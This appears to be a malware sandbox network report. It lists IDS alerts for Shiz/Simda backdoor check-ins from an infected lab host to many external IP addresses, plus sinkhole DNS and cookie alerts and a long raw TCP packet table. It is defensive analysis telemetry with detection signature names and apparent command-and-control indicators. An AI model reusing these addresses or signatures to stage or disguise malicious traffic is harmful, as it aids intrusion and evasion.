                                                                                                                                                                                                              2024-08-23T18:47:38.714787+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15112980192.168.2.4103.224.212.210
                                                                                                                                                                                                              2024-08-23T18:47:38.714787+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15112980192.168.2.4103.224.212.210
                                                                                                                                                                                                              2024-08-23T18:48:24.316430+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:48:24.316430+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:49:03.680235+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin156400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:51.938477+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427480192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:51.938477+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427480192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:04.229267+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:04.229267+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:01.471543+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973480192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:01.471543+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973480192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:01.607947+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:47:01.607947+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:48:59.424615+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638480192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:48:59.424615+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638480192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:48:59.226341+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638780192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:48:59.226341+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638780192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:47:15.205704+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965880192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:47:15.205704+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965880192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:47:01.882748+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:01.882748+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:49:00.250436+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639480192.168.2.485.17.31.122
                                                                                                                                                                                                              2024-08-23T18:49:00.250436+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639480192.168.2.485.17.31.122
                                                                                                                                                                                                              2024-08-23T18:47:51.929926+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427280192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:51.929926+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427280192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:49:02.104297+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:49:02.104297+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:53.751639+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:53.751639+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:49:00.145020+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:49:00.145020+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:49:03.182843+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:49:03.182843+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:47.291874+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16380380192.168.2.452.34.198.229
                                                                                                                                                                                                              2024-08-23T18:47:47.291874+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16380380192.168.2.452.34.198.229
                                                                                                                                                                                                              2024-08-23T18:47:00.273297+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153530041.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:51.839405+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:51.839405+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:48:36.203452+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429880192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:36.203452+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429880192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:01.747669+0200TCP2018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz1804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:01.747669+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst1804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:04.673377+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:04.673377+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:48:28.799086+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429080192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:48:28.799086+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429080192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:48:39.716171+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429980192.168.2.415.197.240.20
                                                                                                                                                                                                              2024-08-23T18:48:39.716171+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429980192.168.2.415.197.240.20
                                                                                                                                                                                                              2024-08-23T18:48:59.233027+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638680192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:59.233027+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638680192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:36.639004+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430180192.168.2.4103.224.182.252
                                                                                                                                                                                                              2024-08-23T18:48:36.639004+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430180192.168.2.4103.224.182.252
                                                                                                                                                                                                              2024-08-23T18:47:38.185426+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15112480192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:47:38.185426+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15112480192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:48:26.313142+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:48:26.313142+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:19.476260+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15111280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:19.476260+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15111280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:49.946120+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16330880192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:49.946120+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16330880192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:36.973905+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430380192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:48:36.973905+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430380192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:47:51.546324+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:51.546324+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:48:50.293064+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430680192.168.2.415.197.240.20
                                                                                                                                                                                                              2024-08-23T18:48:50.293064+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430680192.168.2.415.197.240.20
                                                                                                                                                                                                              2024-08-23T18:48:59.339923+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639080192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:59.339923+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639080192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:54.165366+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:54.165366+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966080192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:47:25.891710+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966280192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:47:25.891710+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966280192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:47:01.518998+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:01.518998+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:48:31.622568+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16428980192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:48:31.622568+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16428980192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:48:23.528835+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16428880192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:48:23.528835+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16428880192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:48:24.959067+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin164293443192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:02.370944+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965680192.168.2.491.195.240.19
                                                                                                                                                                                                              2024-08-23T18:47:02.126233+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin149654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:17.469876+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15111280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:17.469876+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15111280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:52.109062+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427580192.168.2.469.162.80.60
                                                                                                                                                                                                              2024-08-23T18:47:52.109062+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427580192.168.2.469.162.80.60
                                                                                                                                                                                                              2024-08-23T18:49:01.672638+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:49:01.672638+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              2024-08-23T18:48:35.640695+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429780192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:48:35.640695+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429780192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:48:57.938393+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153535451.1.1.1192.168.2.4
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.748311996 CEST4973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.753709078 CEST8049731188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.753776073 CEST4973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.753926039 CEST4973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.762240887 CEST8049731188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.834583044 CEST4973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.843466997 CEST8049732162.255.119.102192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.843549013 CEST4973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.843699932 CEST4973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.851594925 CEST8049732162.255.119.102192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.919483900 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.931188107 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.931265116 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.931417942 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.945655107 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.950002909 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.950649023 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.950830936 CEST4973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.955867052 CEST804973444.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.955925941 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956464052 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956499100 CEST80497353.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956553936 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956649065 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956880093 CEST8049736199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.956979036 CEST4973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.957045078 CEST4973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.962131977 CEST804973444.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.962142944 CEST80497353.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.962152958 CEST8049736199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.996495962 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.003168106 CEST806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.003227949 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.003374100 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.013606071 CEST806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.164535046 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.170217037 CEST804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.170300007 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.170407057 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.175338030 CEST804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.237946033 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.249221087 CEST80496523.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.253348112 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.253634930 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.262073040 CEST80496523.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.350383043 CEST4965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.356230974 CEST8049653172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.356312037 CEST4965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.356399059 CEST4965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.362689018 CEST8049653172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.471368074 CEST804973444.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.471458912 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.471543074 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.473287106 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.480647087 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.483238935 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.486578941 CEST804973444.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.486644030 CEST4973480192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.487250090 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.490963936 CEST804973444.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518697977 CEST806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518762112 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518945932 CEST8049731188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518997908 CEST4973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.520199060 CEST806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.520251036 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.520273924 CEST6020980192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.530188084 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.530220985 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.530348063 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.530946016 CEST806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.543596029 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.543611050 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.589385986 CEST80497353.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.589447021 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.590604067 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.596534967 CEST80497353.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.607887983 CEST8049732162.255.119.102192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.607947111 CEST4973280192.168.2.4162.255.119.102
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.618794918 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.618856907 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.623140097 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.630845070 CEST804965569.162.80.60192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.630913973 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.631045103 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.637155056 CEST804965569.162.80.60192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.642194986 CEST4965680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.647559881 CEST804965691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.647650957 CEST4965680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.647768021 CEST4965680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.654727936 CEST804965691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.728394985 CEST804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.728463888 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.729518890 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.747668982 CEST804965118.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.747721910 CEST4965180192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.778620958 CEST80497353.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.778688908 CEST4973580192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.793153048 CEST80496523.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.793323040 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.793757915 CEST80496523.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.793817997 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.794491053 CEST4965280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.803776026 CEST80496523.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.882685900 CEST8049653172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.882747889 CEST4965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.882869959 CEST4965380192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.890460014 CEST4965780192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.891274929 CEST8049653172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.898391008 CEST8049657172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.898458004 CEST4965780192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.898557901 CEST4965780192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.907430887 CEST8049657172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.956152916 CEST4965880192.168.2.45.79.71.225
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.962145090 CEST80496585.79.71.225192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.962209940 CEST4965880192.168.2.45.79.71.225
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.962342978 CEST4965880192.168.2.45.79.71.225
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.968281984 CEST80496585.79.71.225192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.039536953 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.039613962 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.071765900 CEST8049736199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.071829081 CEST4973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.118827105 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.118844986 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.119187117 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.119256020 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.126070976 CEST49654443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.172492981 CEST44349654188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.186418056 CEST804965569.162.80.60192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.186518908 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.186646938 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.191792965 CEST804965569.162.80.60192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.191854000 CEST4965580192.168.2.469.162.80.60
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.194189072 CEST804965569.162.80.60192.168.2.4
